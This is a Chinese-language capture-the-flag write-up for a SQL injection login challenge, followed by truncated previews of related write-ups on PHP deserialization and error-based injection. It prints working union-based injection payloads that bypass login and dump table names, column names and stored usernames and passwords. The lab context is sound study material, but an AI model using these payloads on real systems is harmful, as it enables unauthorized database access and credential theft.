目錄題目還是熟悉的登陸介面,先嘗試一下萬能密碼的登陸
顯示登陸成功,但是flag貌似不對
看起來像是md5的加密,但是卻無法解密
查詢字段
admin' order by x #
當查詢到4的時候返回unknown column '4' in 'order clause'
然後用1' union select 1,2,3 #
所以回顯點為2,3
查資料庫名
得到資料庫名為geek
爆表
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
得到兩個資料表名
我們嘗試l0ve1ysq1
這個資料表
爆欄位
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1' #
得到這三個子段
爆資料
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #
得到flag
endacc
極客大挑戰 2019 PHP
開啟以後,是三個php原始碼,其中最重要的是class.php,如下 include flag.php error reporting 0 class name function wakeup function destruct if this username admin else 看了一下,這個...
極客大挑戰 2019 HardSQL wp
有過濾,抓個包fuzz一下 等號,空格等被過濾 發現可以用報錯注入,空格可以用括號代替 查表名username admin or extractvalue 1,concat 0x7e,select group concat column name from information schema.co...
極客大挑戰 2019 PHP
剛進入 我們可以看到這樣的乙個介面 根據內容提示,有備份 的習慣 日常後台掃瞄,發現有www.zip檔案,我們進行解壓得到 看到flag.php開啟檢視,發現沒有什麼有用的資訊。我們開啟index.php看看 我們可以看到通過get方式傳入引數select,並對引數select進行反序列化。接下來,...